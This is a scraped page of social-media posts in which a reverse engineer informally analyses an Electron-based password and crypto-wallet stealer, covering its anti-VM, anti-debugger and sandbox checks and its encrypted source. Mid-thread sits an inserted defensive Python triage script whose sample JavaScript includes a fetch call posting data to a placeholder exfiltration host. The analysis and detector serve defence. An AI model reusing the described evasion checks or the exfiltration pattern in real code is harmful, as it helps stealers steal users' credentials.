Notices by Foone🏳️⚧️ (foone@digipres.club), page 2
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 07:02:23 JST
@xssfox that's one of the reasons I mainly hack games from the 90s. They don't change, even as the decades do
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:25 JST
other debug strings are in portuguese!? this is a very international bit of malware
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:24 JST
so this seems to be associated with leetb.iwannaeatcats[.com]
it sends them the data after it steals it. usual suspects: all the passwords out of your browsers, discord & telegram, minecraft & roblox, & any wallet
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:23 JST
and Growtopia. I didn't know that game existed, but apparently there's malware out there trying to steal your passwords for it
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:22 JST
whenever you find the worst pits of the internet, you will find cloudflare there, quietly making money off it.
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:21 JST
it also refuses to run if your external IP is one of a couple, which include a hungarian ISP, a couple IPs in moscow, and azure
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:20 JST
it is also apparently dumping these stolen passwords into a discord somewhere, and if it steals your wallet password it dumps it with "🤡 Leet Stealer"
even the bad guys think you're a clown for using cryptocurrency
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:10 JST
on a day with no ADHD meds, my roommate knocks on the door and is like "a friend got their discord hacked but before I knew it they sent me an EXE and I ran it. am I hacked?"
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:09 JST
seems it is an electron based javascript malware that tries to steal all your passwords from all your browsers
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:09 JST
I am some kind of reverse engineer/security engineer but I'm not very good at it WHEN MY BRAIN DOESN'T WORK
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:08 JST
huh, one of the things it does is check your RAM speed.
I think because that's a thing real computers have, and it's trying to do a roundabout VM check?
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:07 JST
it even checks against OllyDbg, a really great debugger that hasn't updated in 11 years
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:07 JST
but yeah it does a bunch of checks to see if anything remotely debuggy or VMy is running or even installed, then refuses to do stuff
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:06 JST
I'm looking at this disassembly from dez_ on twitter.
https://gist.github.com/joe-desimone/64b3c1044c184ffc8f26090d7bcd32b5
-
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:05 JST
yes let me accidentally try to unpack the electron app in poland, that's exactly the kind of protection I need: geographic protection
In conversation from digipres.club permalink -
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:05 JST
there's a lot of very specific checks before it tries to do anything, I think this has been carefully designed to appear innocuous to the commonly used online sandboxes. like, it detects if it's running on virustotal and throws an error, instead of doing anything sneaky-deaky
In conversation from digipres.club permalink -
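A defender-side static triage helper for the kind of Electron stealer described in these posts, added here as an illustration: it is not Foone's code, not the gist linked in the thread, and not the malware's own logic. It scans unpacked JavaScript for the anti-analysis and exfiltration indicators the thread mentions (debugger names, sandbox/VirusTotal checks, hard-coded IP lists, RAM-speed probes, outbound hosts, an AES primitive next to an encrypted blob) and defangs everything it reports. The sample JS, the debugger names other than OllyDbg, the WMI memory-speed strings, the extra sandbox markers and the placeholder hosts and IPs are assumptions for the example, not observations from this sample.

```python
"""
Static triage for an unpacked Electron bundle: flag the anti-analysis and
exfiltration indicators described in the thread and report them defanged.
Added example; not the thread's, the gist's, or the malware's code.
"""
import re
from collections import defaultdict

# OllyDbg and VirusTotal are named in the thread; the other debugger names,
# sandbox markers and the WMI memory query are assumptions about what such
# checks commonly look for, not observations from this sample.
DEBUGGER_NAMES = ("ollydbg", "x64dbg", "x32dbg", "windbg", "ida64", "wireshark", "procmon")
SANDBOX_MARKERS = ("virustotal", "sandbox", "any.run", "cuckoo")
RAM_QUERY_MARKERS = ("win32_physicalmemory", "memorychip", "get speed")

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?::\d+)?(?:/[^\s'\"`)]*)?")
STRING_RE = re.compile(r"""["'`]([^"'`\n]{1,200})["'`]""")
BASE64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

# Constructed sample mirroring the shape of the checks the thread describes;
# the IPs are TEST-NET addresses and the host is a placeholder, not real infrastructure.
SAMPLE_JS = r"""
const blockedIps = ["203.0.113.7", "198.51.100.22"];
const badProcs = ["ollydbg.exe", "x64dbg.exe"];
if (require("os").hostname().toLowerCase().includes("virustotal")) throw new Error("no");
exec("wmic memorychip get speed", (err, out) => { if (parseInt(out) === 0) process.exit(1); });
fetch("https://exfil-host.example/upload", { method: "POST", body: payload });
"""


def defang(host: str) -> str:
    """Render a host or IP safe to paste into a report (1.2.3.4 -> 1.2.3[.]4)."""
    head, _, tail = host.rpartition(".")
    return f"{head}[.]{tail}" if head else host


def _valid_ipv4(text: str) -> bool:
    return all(0 <= int(octet) <= 255 for octet in text.split("."))


def triage(js_source: str) -> dict:
    """Return {category: sorted list of defanged indicators} for one JS file."""
    found = defaultdict(set)
    lowered = js_source.lower()

    # Only string literals are inspected for name-based checks, so a variable
    # called `sandboxed` does not trigger a hit but the literal "virustotal" does.
    for literal in STRING_RE.findall(js_source):
        low = literal.lower()
        if any(name in low for name in DEBUGGER_NAMES):
            found["debugger_check"].add(low)
        if any(mark in low for mark in SANDBOX_MARKERS):
            found["sandbox_check"].add(low)
        if any(mark in low for mark in RAM_QUERY_MARKERS):
            found["hardware_probe"].add(low)

    # Hard-coded IPv4 literals: the thread's "refuses to run if your external
    # IP is one of a couple" check leaves these lying around in the source.
    for ip in IPV4_RE.findall(js_source):
        if _valid_ipv4(ip):
            found["hardcoded_ip"].add(defang(ip))

    for host in URL_RE.findall(js_source):
        found["outbound_host"].add(defang(host))

    # An AES primitive next to a large base64 blob is the "source is actually
    # encrypted, not just obfuscated" case from the thread: the analyst needs
    # the decryption key, not a deobfuscator.
    if "aes" in lowered and BASE64_BLOB_RE.search(js_source):
        found["encrypted_payload"].add("aes primitive + large base64 blob")

    return {k: sorted(v) for k, v in sorted(found.items())}


if __name__ == "__main__":
    for category, hits in triage(SAMPLE_JS).items():
        print(f"{category}: {', '.join(hits)}")
```

Run it over each `.js` file pulled out of the app's asar archive; a file with no hits in any category is usually just framework code, while one that lights up `debugger_check`, `hardcoded_ip` and `outbound_host` together is where to start reading. Hits are defanged on output so the report can be pasted into a ticket without creating clickable links to the infrastructure.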
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:04 JST
god I bet there are some malware out there that checks your location on GPS before running, and errors out if you're too close to Known Antivirus companies
In conversation from digipres.club permalink -
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:03 JST
OH GOOD this is a different version that uses aes compression. so the source isn't just obfuscated, it's actually encrypted.
In conversation from digipres.club permalink -
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:03 JST
sure there's work-from-home, but you're probably still within a reasonable driving distance of the office. they could just blacklist the entire metropolitan area
In conversation from digipres.club permalink -
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:02 JST
I hope these fuckers aren't trying to obfuscate the password by abusing javascript scoping
In conversation from digipres.club permalink